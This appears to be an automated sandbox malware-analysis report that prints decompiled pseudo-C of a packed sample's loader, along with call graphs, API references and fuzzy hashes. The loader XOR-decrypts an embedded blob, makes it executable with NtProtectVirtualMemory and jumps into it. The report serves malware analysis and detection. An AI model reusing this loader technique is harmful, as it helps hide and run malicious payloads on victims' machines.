33284->33222 33285->33231 33286->33237 33287->33239 33289 408e40 33288->33289 33365 408d87 33289->33365 33292 41e047 2 API calls 33293 408e53 33292->33293 33293->33292 33294 408ede 33293->33294 33296 408ed9 33293->33296 33373 40f7d7 33293->33373 33294->33245 33295 41dfd7 2 API calls 33297 408f11 33295->33297 33296->33295 33297->33294 33298 41d857 LdrLoadDll 33297->33298 33299 408f76 33298->33299 33299->33294 33377 41d897 33299->33377 33301 408fda 33301->33294 33302 418677 8 API calls 33301->33302 33303 40902f 33302->33303 33303->33245 33305 41fb37 2 API calls 33304->33305 33306 41d38e 33305->33306 33332 40a967 33306->33332 33308 41d3a9 33309 41d3ca 33308->33309 33310 41d3de 33308->33310 33311 41fa57 2 API calls 33309->33311 33313 41f9d7 2 API calls 33310->33313 33312 41d3d4 33311->33312 33312->33275 33314 41d445 33313->33314 33315 41f9d7 2 API calls 33314->33315 33316 41d45e 33315->33316 33322 41d72e 33316->33322 33338 41fa17 33316->33338 33319 41d71a 33320 41fa57 2 API calls 33319->33320 33321 41d724 33320->33321 33321->33275 33323 41fa57 2 API calls 33322->33323 33324 41d783 33323->33324 33324->33275 33326 408d26 33325->33326 33327 408c3c 33325->33327 33326->33277 33327->33326 33328 418677 8 API calls 33327->33328 33329 408ca9 33328->33329 33330 41fa57 2 API calls 33329->33330 33331 408cd0 33329->33331 33330->33331 33331->33277 33333 40a98c 33332->33333 33334 40c317 LdrLoadDll 33333->33334 33335 40a9bf 33334->33335 33337 40a9e4 33335->33337 33342 40de97 33335->33342 33337->33308 33339 41fa1d 33338->33339 33359 41e0c7 33339->33359 33343 40dec3 33342->33343 33344 41dd27 LdrLoadDll 33343->33344 33345 40dedc 33344->33345 33346 40dee3 33345->33346 33353 41dd67 33345->33353 33346->33337 33350 40df1e 33351 41dfd7 2 API calls 33350->33351 33352 40df41 33351->33352 33352->33337 33354 41dd83 33353->33354 33355 41eb17 LdrLoadDll 33353->33355 33357 af9710 LdrInitializeThunk 33354->33357 33355->33354 33356 40df06 33356->33346 33358 41e357 LdrLoadDll 33356->33358 33357->33356 33358->33350 33360 41eb17 LdrLoadDll 33359->33360 33361 41e0e3 33360->33361 33364 af9a00 LdrInitializeThunk 33361->33364 33362 41d713 33362->33319 33362->33322 33364->33362 33366 408d9f 33365->33366 33367 40c317 LdrLoadDll 33366->33367 33368 408dba 33367->33368 33369 418a87 LdrLoadDll 33368->33369 33370 408dca 33369->33370 33371 408dd3 PostThreadMessageW 33370->33371 33372 408de7 33370->33372 33371->33372 33372->33293 33374 40f7ea 33373->33374 33380 41d9d7 33374->33380 33378 41d8b3 33377->33378 33379 41eb17 LdrLoadDll 33377->33379 33378->33301 33379->33378 33381 41eb17 LdrLoadDll 33380->33381 33382 41d9f3 33381->33382 33385 af9840 LdrInitializeThunk 33382->33385 33383 40f815 33383->33293 33385->33383 33386->33173 33388 41eb17 LdrLoadDll 33387->33388 33389 41db23 33388->33389 33390 40f665 33389->33390 33392 af99a0 LdrInitializeThunk 33389->33392 33390->33179 33390->33180 33392->33390 33393->33185 33394->33190 33395->33195 33398 af9540 LdrInitializeThunk

                                                  Executed Functions

                                                  Function 004012A4 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 186nativeCOMMONCrypto
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 20 4012a4-4012ac 21 4012c8-4012ea 20->21 22 4012ae 20->22 24 4012eb-4014e7 call 4016b0 call 401260 call 401190 call 4016b0 * 2 call 4010a0 call 401730 21->24 23 4012b0-4012c6 22->23 22->24 23->21 39 4014f0-4014ff 24->39 40 401501-401504 39->40 41 401512-401519 39->41 40->41 42 401506-40150a 40->42 41->39 43 40151b 41->43 42->41 44 40150c-401510 42->44 45 40151e-401573 NtProtectVirtualMemory call 4016b0 43->45 44->41 46 401586-40158c 44->46 50 401579 call 422f47 45->50 51 401579 call 422f39 45->51 46->45 49 40157b-401585 50->49 51->49
                                                  C-Code - Quality: 49%
                                                  			E004012A4(signed char __eax, unsigned int __ebx, void* __ecx, void* __edx) {
				short _v2;
				long _v4;
				intOrPtr _v8;
				short _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v32;
				char _v33;
				short _v35;
				long _v39;
				short _v40;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				void* _v68;
				intOrPtr _v76;
				intOrPtr _v80;
				char _v81;
				short _v83;
				long _v87;
				short _v88;
				short _v92;
				signed int _v96;
				char _v104;
				char _v112;
				char _v113;
				char _v114;
				signed int _v116;
				long _v120;
				long _v124;
				short _v126;
				short _v130;
				char _v148;
				char _v160;
				signed char _t86;
				void* _t98;
				void* _t110;
				void* _t126;
				signed int _t130;
				void* _t136;
				void* _t138;
				unsigned int _t141;
				void* _t148;
				unsigned int _t149;
				signed int _t151;

				_t86 = __eax;
				_t121 = __ebx >> 1;
				_t149 = _t121;
				if(_t149 >= 0) {
					L3:
					_t151 = _t86 & 0x00000000;
					 *_t86 =  *_t86 + _t86;
					asm("xorps xmm0, xmm0");
					asm("movq [ebp-0x67], xmm0");
					asm("movq [ebp-0x5f], xmm0");
					asm("movq [ebp-0x6f], xmm0");
					asm("movq [ebp-0x37], xmm0");
					asm("movq [ebp-0x2f], xmm0");
					asm("movdqa [ebp-0x70], xmm0");
				} else {
					if(_t149 > 0) {
						_push(_t121);
						_t121 = _t141;
						_t148 = (_t141 - 0x00000008 & 0xfffffff0) + 4;
						_push(_t138);
						_v8 =  *((intOrPtr*)(_t141 + 4));
						_t138 = _t148;
						_t141 = _t148 - 0xa8;
						goto L3;
					}
				}
				asm("movq [ebp-0x70], mm0");
				asm("movq [ebp-0x3f], xmm0");
				asm("movq [ebp-0x9c], xmm0");
				asm("movq [ebp-0x60], xmm0");
				_v80 = 0xdf82a1b5;
				_v76 = 0x961d1ca3;
				asm("movq xmm0, [ebp-0x50]");
				asm("movq [ebp-0x70], xmm0");
				asm("xorps xmm0, xmm0");
				_v104 = 0x28;
				asm("movdqa [ebp-0x40], xmm0");
				asm("movq [ebp-0x30], xmm0");
				_v32 = 0x9866c596;
				asm("movq [ebp-0xc], xmm0");
				_v28 = 0x7b1dba2;
				asm("movq xmm0, [ebp-0x20]");
				asm("movq [ebp-0x40], xmm0");
				_v60 = _v60 ^ 0x10222f38;
				_v64 = _v32 ^ 0x10222f38;
				_v16 = 0xf7da08e6;
				_v24 = 0x691d4748;
				_v20 = 0x87e62da;
				asm("movq xmm0, [ebp-0x18]");
				asm("movq [ebp-0x38], xmm0");
				_v56 = _v56 ^ 0x10222f38;
				_v52 = _v52 ^ 0x10222f38;
				_v87 = 0;
				_v39 = 0;
				_v160 = 0;
				_v83 = 0;
				_v81 = 0;
				_v35 = 0;
				_v33 = 0;
				_v88 = 0;
				_v40 = 0;
				_v4 = 0;
				_v48 = _v16 ^ 0x10222f38;
				E004016B0(_t121,  &_v112, 9,  &_v64);
				_v148 = 0;
				_v130 = 0;
				_v126 = 0;
				asm("xorps xmm0, xmm0");
				asm("movq [ebp-0x92], xmm0");
				asm("movq [ebp-0x8a], xmm0");
				E00401260( &_v148,  &_v112);
				_t98 = E00401190(_t151,  &_v148);
				asm("xorps xmm0, xmm0");
				asm("movdqa [ebp-0x70], xmm0");
				asm("movq [ebp-0x60], xmm0");
				_v88 = 0;
				E004016B0(_t121,  &_v112, 0xa,  &_v64);
				asm("xorps xmm0, xmm0");
				asm("movq [ebp-0x60], xmm0");
				_v16 = 0x5a1c48e0;
				_v96 = _v16;
				_v12 = 0xfb7d;
				asm("movdqa [ebp-0x70], xmm0");
				_v92 = _v12;
				asm("movq [ebp-0xa], xmm0");
				_v32 = 0x63682b43;
				_v28 = 0xbf4e8842;
				asm("movq xmm0, [ebp-0x20]");
				asm("movq [ebp-0x70], xmm0");
				_v24 = 0x7757d946;
				_v20 = 0xc888339;
				asm("movq xmm0, [ebp-0x18]");
				_v88 = 0;
				_v2 = 0;
				asm("movq [ebp-0x68], xmm0");
				E004016B0(_t121,  &_v112, 0x16,  &_v64);
				E004010A0( &_v160, _t98,  &_v112, 0, 0);
				_v68 = 0;
				_t110 = E00401730();
				_t126 = 0;
				while(1) {
					_t130 =  *(_t126 + _t110) ^ 0x11a7a880;
					_v116 = _t130;
					if(_t130 == 0x3e && _t130 == 0x97 && _v114 == 0xbd && _v113 == 0xba) {
						break;
					}
					_t126 = _t126 + 1;
					if(_t126 < 0x4000) {
						continue;
					} else {
						_t136 = _v68;
					}
					L11:
					_v120 = 0;
					_v124 = 0x2ca00;
					NtProtectVirtualMemory(0xffffffff,  &_v68,  &_v124, 0x40,  &_v120); // executed
					_v64 = _v64 ^ 0x11a7a880;
					_v60 = _v60 ^ 0x11a7a880;
					_v56 = _v56 ^ 0x11a7a880;
					_v52 = _v52 ^ 0x11a7a880;
					_v48 = _v48 ^ 0x11a7a880;
					E004016B0(_t121, _t136, 0x2ca00,  &_v64);
					_t83 = _t136 + 0x21810; // 0x21810, executed
					 *_t83(); // executed
					return 0;
				}
				_t136 = _t126 + _t110;
				_v68 = _t136;
				goto L11;
			}




















































                                                  0x004012a4
                                                  0x004012aa
                                                  0x004012aa
                                                  0x004012ac
                                                  0x004012c8
                                                  0x004012c8
                                                  0x004012ca
                                                  0x004012ce
                                                  0x004012d1
                                                  0x004012d6
                                                  0x004012db
                                                  0x004012e0
                                                  0x004012e5
                                                  0x004012ea
                                                  0x004012ae
                                                  0x004012ae
                                                  0x004012b0
                                                  0x004012b1
                                                  0x004012b9
                                                  0x004012bc
                                                  0x004012c0
                                                  0x004012c4
                                                  0x004012c6
                                                  0x00000000
                                                  0x004012c6
                                                  0x004012ae
                                                  0x004012eb
                                                  0x004012ef
                                                  0x004012f4
                                                  0x004012fc
                                                  0x00401301
                                                  0x00401308
                                                  0x0040130f
                                                  0x00401314
                                                  0x00401319
                                                  0x0040131e
                                                  0x00401321
                                                  0x00401326
                                                  0x0040132b
                                                  0x00401335
                                                  0x0040133f
                                                  0x00401346
                                                  0x0040134b
                                                  0x00401350
                                                  0x00401357
                                                  0x0040135e
                                                  0x00401368
                                                  0x0040136f
                                                  0x00401376
                                                  0x0040137e
                                                  0x00401383
                                                  0x0040138a
                                                  0x00401399
                                                  0x004013a0
                                                  0x004013a8
                                                  0x004013b2
                                                  0x004013b8
                                                  0x004013bc
                                                  0x004013c2
                                                  0x004013c6
                                                  0x004013cc
                                                  0x004013d2
                                                  0x004013d9
                                                  0x004013dc
                                                  0x004013e3
                                                  0x004013ea
                                                  0x004013f0
                                                  0x004013f8
                                                  0x00401402
                                                  0x0040140a
                                                  0x00401412
                                                  0x0040141e
                                                  0x00401429
                                                  0x00401431
                                                  0x00401436
                                                  0x0040143b
                                                  0x00401442
                                                  0x00401447
                                                  0x0040144a
                                                  0x0040144f
                                                  0x00401459
                                                  0x0040145c
                                                  0x00401466
                                                  0x0040146b
                                                  0x0040146f
                                                  0x00401478
                                                  0x0040147f
                                                  0x00401486
                                                  0x0040148b
                                                  0x00401493
                                                  0x0040149a
                                                  0x004014a1
                                                  0x004014a9
                                                  0x004014af
                                                  0x004014b5
                                                  0x004014ba
                                                  0x004014cf
                                                  0x004014d9
                                                  0x004014e0
                                                  0x004014e5
                                                  0x004014f0
                                                  0x004014f3
                                                  0x004014f9
                                                  0x004014ff
                                                  0x00000000
                                                  0x00000000
                                                  0x00401512
                                                  0x00401519
                                                  0x00000000
                                                  0x0040151b
                                                  0x0040151b
                                                  0x0040151b
                                                  0x0040151e
                                                  0x0040152e
                                                  0x00401535
                                                  0x0040153c
                                                  0x0040153e
                                                  0x00401545
                                                  0x0040154c
                                                  0x00401553
                                                  0x0040155a
                                                  0x0040156b
                                                  0x00401573
                                                  0x00401579
                                                  0x00401585
                                                  0x00401585
                                                  0x00401586
                                                  0x00401589
                                                  0x00000000

                                                  APIs
                                                  • NtProtectVirtualMemory.NTDLL(000000FF,00000000,?,00000040,?), ref: 0040153C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_hvbvmxm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MemoryProtectVirtual
                                                  • String ID: C+hc
                                                  • API String ID: 2706961497-3848425603
                                                  • Opcode ID: 6c6a0a142887b784e5fa5ce0febc2e7f11be7be009093d5d6fe39cd23954e054
                                                  • Instruction ID: 5f2fc46273f2a988fd33b2da9c61ea0e16046221c740d3513727dfc5c87a36e1
                                                  • Opcode Fuzzy Hash: 6c6a0a142887b784e5fa5ce0febc2e7f11be7be009093d5d6fe39cd23954e054
                                                  • Instruction Fuzzy Hash: 758146B1C2075CAADF10CFE4CC41AEEBBB4BF99300F60421EE415BB291EB7516858B95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004012B0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 182nativeCOMMONCrypto
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  C-Code - Quality: 47%
                                                  			_entry_(signed int __eax) {
				intOrPtr _v8;
				short _v14;
				long _v16;
				short _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v45;
				short _v47;
				long _v51;
				short _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				void* _v80;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v93;
				short _v95;
				long _v99;
				short _v100;
				short _v104;
				signed int _v108;
				char _v116;
				char _v124;
				char _v125;
				char _v126;
				signed int _v128;
				long _v132;
				long _v136;
				short _v138;
				short _v142;
				char _v160;
				char _v172;
				void* __ebx;
				void* _t97;
				void* _t109;
				void* _t122;
				signed int _t124;
				void* _t130;
				void* _t136;
				signed int _t146;

				_t119 = _t136;
				_v8 =  *((intOrPtr*)(_t136 + 4));
				_t146 = __eax & 0x00000000;
				 *__eax =  *__eax + __eax;
				asm("xorps xmm0, xmm0");
				asm("movq [ebp-0x67], xmm0");
				asm("movq [ebp-0x5f], xmm0");
				asm("movq [ebp-0x6f], xmm0");
				asm("movq [ebp-0x37], xmm0");
				asm("movq [ebp-0x2f], xmm0");
				asm("movdqa [ebp-0x70], xmm0");
				asm("movq [ebp-0x70], mm0");
				asm("movq [ebp-0x3f], xmm0");
				asm("movq [ebp-0x9c], xmm0");
				asm("movq [ebp-0x60], xmm0");
				_v92 = 0xdf82a1b5;
				_v88 = 0x961d1ca3;
				asm("movq xmm0, [ebp-0x50]");
				asm("movq [ebp-0x70], xmm0");
				asm("xorps xmm0, xmm0");
				_v116 = 0x28;
				asm("movdqa [ebp-0x40], xmm0");
				asm("movq [ebp-0x30], xmm0");
				_v44 = 0x9866c596;
				asm("movq [ebp-0xc], xmm0");
				_v40 = 0x7b1dba2;
				asm("movq xmm0, [ebp-0x20]");
				asm("movq [ebp-0x40], xmm0");
				_v72 = _v72 ^ 0x10222f38;
				_v76 = _v44 ^ 0x10222f38;
				_v28 = 0xf7da08e6;
				_v36 = 0x691d4748;
				_v32 = 0x87e62da;
				asm("movq xmm0, [ebp-0x18]");
				asm("movq [ebp-0x38], xmm0");
				_v68 = _v68 ^ 0x10222f38;
				_v64 = _v64 ^ 0x10222f38;
				_v99 = 0;
				_v51 = 0;
				_v172 = 0;
				_v95 = 0;
				_v93 = 0;
				_v47 = 0;
				_v45 = 0;
				_v100 = 0;
				_v52 = 0;
				_v16 = 0;
				_v60 = _v28 ^ 0x10222f38;
				E004016B0(_t119,  &_v124, 9,  &_v76);
				_v160 = 0;
				_v142 = 0;
				_v138 = 0;
				asm("xorps xmm0, xmm0");
				asm("movq [ebp-0x92], xmm0");
				asm("movq [ebp-0x8a], xmm0");
				E00401260( &_v160,  &_v124);
				_t97 = E00401190(_t146,  &_v160);
				asm("xorps xmm0, xmm0");
				asm("movdqa [ebp-0x70], xmm0");
				asm("movq [ebp-0x60], xmm0");
				_v100 = 0;
				E004016B0(_t119,  &_v124, 0xa,  &_v76);
				asm("xorps xmm0, xmm0");
				asm("movq [ebp-0x60], xmm0");
				_v28 = 0x5a1c48e0;
				_v108 = _v28;
				_v24 = 0xfb7d;
				asm("movdqa [ebp-0x70], xmm0");
				_v104 = _v24;
				asm("movq [ebp-0xa], xmm0");
				_v44 = 0x63682b43;
				_v40 = 0xbf4e8842;
				asm("movq xmm0, [ebp-0x20]");
				asm("movq [ebp-0x70], xmm0");
				_v36 = 0x7757d946;
				_v32 = 0xc888339;
				asm("movq xmm0, [ebp-0x18]");
				_v100 = 0;
				_v14 = 0;
				asm("movq [ebp-0x68], xmm0");
				E004016B0(_t119,  &_v124, 0x16,  &_v76);
				E004010A0( &_v172, _t97,  &_v124, 0, 0);
				_v80 = 0;
				_t109 = E00401730();
				_t122 = 0;
				while(1) {
					_t124 =  *(_t122 + _t109) ^ 0x11a7a880;
					_v128 = _t124;
					if(_t124 == 0x3e && _t124 == 0x97 && _v126 == 0xbd && _v125 == 0xba) {
						break;
					}
					_t122 = _t122 + 1;
					if(_t122 < 0x4000) {
						continue;
					} else {
						_t130 = _v80;
					}
					L9:
					_v132 = 0;
					_v136 = 0x2ca00;
					NtProtectVirtualMemory(0xffffffff,  &_v80,  &_v136, 0x40,  &_v132); // executed
					_v76 = _v76 ^ 0x11a7a880;
					_v72 = _v72 ^ 0x11a7a880;
					_v68 = _v68 ^ 0x11a7a880;
					_v64 = _v64 ^ 0x11a7a880;
					_v60 = _v60 ^ 0x11a7a880;
					E004016B0(_t119, _t130, 0x2ca00,  &_v76);
					_t82 = _t130 + 0x21810; // 0x21810, executed
					 *_t82(); // executed
					return 0;
				}
				_t130 = _t122 + _t109;
				_v80 = _t130;
				goto L9;
			}

















































                                                  0x004012b1
                                                  0x004012c0
                                                  0x004012c8
                                                  0x004012ca
                                                  0x004012ce
                                                  0x004012d1
                                                  0x004012d6
                                                  0x004012db
                                                  0x004012e0
                                                  0x004012e5
                                                  0x004012ea
                                                  0x004012eb
                                                  0x004012ef
                                                  0x004012f4
                                                  0x004012fc
                                                  0x00401301
                                                  0x00401308
                                                  0x0040130f
                                                  0x00401314
                                                  0x00401319
                                                  0x0040131e
                                                  0x00401321
                                                  0x00401326
                                                  0x0040132b
                                                  0x00401335
                                                  0x0040133f
                                                  0x00401346
                                                  0x0040134b
                                                  0x00401350
                                                  0x00401357
                                                  0x0040135e
                                                  0x00401368
                                                  0x0040136f
                                                  0x00401376
                                                  0x0040137e
                                                  0x00401383
                                                  0x0040138a
                                                  0x00401399
                                                  0x004013a0
                                                  0x004013a8
                                                  0x004013b2
                                                  0x004013b8
                                                  0x004013bc
                                                  0x004013c2
                                                  0x004013c6
                                                  0x004013cc
                                                  0x004013d2
                                                  0x004013d9
                                                  0x004013dc
                                                  0x004013e3
                                                  0x004013ea
                                                  0x004013f0
                                                  0x004013f8
                                                  0x00401402
                                                  0x0040140a
                                                  0x00401412
                                                  0x0040141e
                                                  0x00401429
                                                  0x00401431
                                                  0x00401436
                                                  0x0040143b
                                                  0x00401442
                                                  0x00401447
                                                  0x0040144a
                                                  0x0040144f
                                                  0x00401459
                                                  0x0040145c
                                                  0x00401466
                                                  0x0040146b
                                                  0x0040146f
                                                  0x00401478
                                                  0x0040147f
                                                  0x00401486
                                                  0x0040148b
                                                  0x00401493
                                                  0x0040149a
                                                  0x004014a1
                                                  0x004014a9
                                                  0x004014af
                                                  0x004014b5
                                                  0x004014ba
                                                  0x004014cf
                                                  0x004014d9
                                                  0x004014e0
                                                  0x004014e5
                                                  0x004014f0
                                                  0x004014f3
                                                  0x004014f9
                                                  0x004014ff
                                                  0x00000000
                                                  0x00000000
                                                  0x00401512
                                                  0x00401519
                                                  0x00000000
                                                  0x0040151b
                                                  0x0040151b
                                                  0x0040151b
                                                  0x0040151e
                                                  0x0040152e
                                                  0x00401535
                                                  0x0040153c
                                                  0x0040153e
                                                  0x00401545
                                                  0x0040154c
                                                  0x00401553
                                                  0x0040155a
                                                  0x0040156b
                                                  0x00401573
                                                  0x00401579
                                                  0x00401585
                                                  0x00401585
                                                  0x00401586
                                                  0x00401589
                                                  0x00000000

                                                  APIs
                                                  • NtProtectVirtualMemory.NTDLL(000000FF,00000000,?,00000040,?), ref: 0040153C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_hvbvmxm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MemoryProtectVirtual
                                                  • String ID: C+hc
                                                  • API String ID: 2706961497-3848425603
                                                  • Opcode ID: 26f1120809d1feb0c163b61a0abebeb7254256f3a3cdf450942e01968005958d
                                                  • Instruction ID: fcc810aa046927e03f53f1a9924a5796219225d0523ae0329bd7461604c32dc9
                                                  • Opcode Fuzzy Hash: 26f1120809d1feb0c163b61a0abebeb7254256f3a3cdf450942e01968005958d
                                                  • Instruction Fuzzy Hash: 5E8135B1C2075CAADF10CFE4CC41AEEBBB4BF99300F60421AE415BB291EB7516858B95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0041E081 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35memorynativeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 82 41e081-41e0c4 call 41eb17 NtAllocateVirtualMemory
                                                  C-Code - Quality: 53%
                                                  			E0041E081(void* __ecx, intOrPtr _a8, void* _a12, PVOID* _a16, long _a20, long* _a24, long _a28, char _a32) {
				long _t14;

				asm("outsb");
				asm("cld");
				asm("sbb edx, [ebp-0x75]");
				_t10 = _a8;
				E0041EB17( *((intOrPtr*)(_a8 + 0x14)), _t10, _t10 + 0xc84,  *((intOrPtr*)(_a8 + 0x14)), 0, 0x30);
				_t4 =  &_a32; // 0x404448
				_t14 = NtAllocateVirtualMemory(_a12, _a16, _a20, _a24, _a28,  *_t4); // executed
				return _t14;
			}




                                                  0x0041e081
                                                  0x0041e083
                                                  0x0041e086
                                                  0x0041e08a
                                                  0x0041e09e
                                                  0x0041e0a3
                                                  0x0041e0c0
                                                  0x0041e0c4

                                                  APIs
                                                  • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,HD@,00002000,00003000,00000004), ref: 0041E0C0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_hvbvmxm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateMemoryVirtual
                                                  • String ID: HD@
                                                  • API String ID: 2167126740-1661062907
                                                  • Opcode ID: 387b29607ff46aa32d144c1736e2695b69092b8efe425d994f9ebe1e44ae0b07
                                                  • Instruction ID: 13dc513da67dbfdf35d7b2783610b2457132d1ee3ed132f4f05716f0de5edc6f
                                                  • Opcode Fuzzy Hash: 387b29607ff46aa32d144c1736e2695b69092b8efe425d994f9ebe1e44ae0b07
                                                  • Instruction Fuzzy Hash: 8BF0FEB6210118AFDB18DFA9DC81EDB77A9EF88354F118209FE0997241D635F911CBB4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0041E087 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memorynativeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 85 41e087-41e09d 86 41e0a3-41e0c4 NtAllocateVirtualMemory 85->86 87 41e09e call 41eb17 85->87 87->86
                                                  C-Code - Quality: 100%
                                                  			E0041E087(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, char _a28) {
				long _t14;

				E0041EB17( *((intOrPtr*)(_a4 + 0x14)), _a4, _t10 + 0xc84,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x30);
				_t4 =  &_a28; // 0x404448
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24,  *_t4); // executed
				return _t14;
			}




                                                  0x0041e09e
                                                  0x0041e0a3
                                                  0x0041e0c0
                                                  0x0041e0c4

                                                  APIs
                                                  • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,HD@,00002000,00003000,00000004), ref: 0041E0C0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_hvbvmxm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateMemoryVirtual
                                                  • String ID: HD@
                                                  • API String ID: 2167126740-1661062907
                                                  • Opcode ID: ff407167e8468b06ad404ccbb9f5efcd270d3cf321b6c6ce0313f5831c1888d1
                                                  • Instruction ID: f463faf2946c0d4d74eccb42d7aa3306e3984d4a8e1b0def0a1c2f8da30aeccc
                                                  • Opcode Fuzzy Hash: ff407167e8468b06ad404ccbb9f5efcd270d3cf321b6c6ce0313f5831c1888d1
                                                  • Instruction Fuzzy Hash: B0F015B6200218ABCB18DF89DC81EEB77ADAF88754F018109BE0997241C630F810CBB4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040C317 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 329 40c317-40c333 330 40c33b-40c340 329->330 331 40c336 call 420837 329->331 332 40c342-40c345 330->332 333 40c346-40c354 call 420c57 330->333 331->330 336 40c364-40c375 call 41f0b7 333->336 337 40c356-40c361 call 420ed7 333->337 342 40c377-40c38b LdrLoadDll 336->342 343 40c38e-40c391 336->343 337->336 342->343
                                                  C-Code - Quality: 100%
                                                  			E0040C317(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E00420837( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E00420C57(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E00420ED7( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041F0B7(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                  0x0040c333
                                                  0x0040c336
                                                  0x0040c33b
                                                  0x0040c340
                                                  0x0040c34a
                                                  0x0040c34f
                                                  0x0040c352
                                                  0x0040c354
                                                  0x0040c35c
                                                  0x0040c361
                                                  0x0040c361
                                                  0x0040c368
                                                  0x0040c370
                                                  0x0040c373
                                                  0x0040c375
                                                  0x0040c389
                                                  0x00000000
                                                  0x0040c38b
                                                  0x0040c391
                                                  0x0040c345
                                                  0x0040c345
                                                  0x0040c345

                                                  APIs
                                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040C389
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.385717427.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_hvbvmxm.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Load
                                                  • String ID:
                                                  • API String ID: 2234796835-0
                                                  • Opcode ID: 064fc8b9e47045ed70fd012ce6989d3b14e09ff0de191e258dc97656c0333484
                                                  • Instruction ID: 3ed70020f7d6b18ccec5613b1dbda4d69e0aa25de14af4a900ab92096e63d096
                                                  • Opcode Fuzzy Hash: 064fc8b9e47045ed70fd012ce6989d3b14e09ff0de191e258dc97656c0333484
                                                  • Instruction Fuzzy Hash: 5D0100B5E00209A7DB10DBA5DC82F9EB7B89F54304F0082A5AD08A7281F635EB588B95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004014E9 Relevance: 1.5, APIs: 1, Instructions: 48nativeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 315 4014e9 316 4014f0-4014ff 315->316 317 401501-401504 316->317 318 401512-401519 316->318 317->318 319 401506-40150a 317->319 318->316 320 40151b 318->320 319->318 321 40150c-401510 319->321 322 40151e-401573 NtProtectVirtualMemory call 4016b0 320->322 321->318 323 401586-40158c 321->323 327 401579 call 422f47 322->327 328 401579 call 422f39 322->328 323->322 326 40157b-401585 327->326 328->326
                                                  C-Code - Quality: 58%
                                                  			E004014E9(void* __eax, void* __ebx, void* __ecx) {
				void* _t25;
				void* _t35;
				void* _t37;
				signed int _t39;
				void* _t41;
				void* _t43;

				_t37 = __ecx;
				_t35 = __ebx;
				_t25 = __eax;
				while(1) {
					_t39 =  *(_t37 + _t25) ^ 0x11a7a880;
					 *(_t43 - 0x74) = _t39;
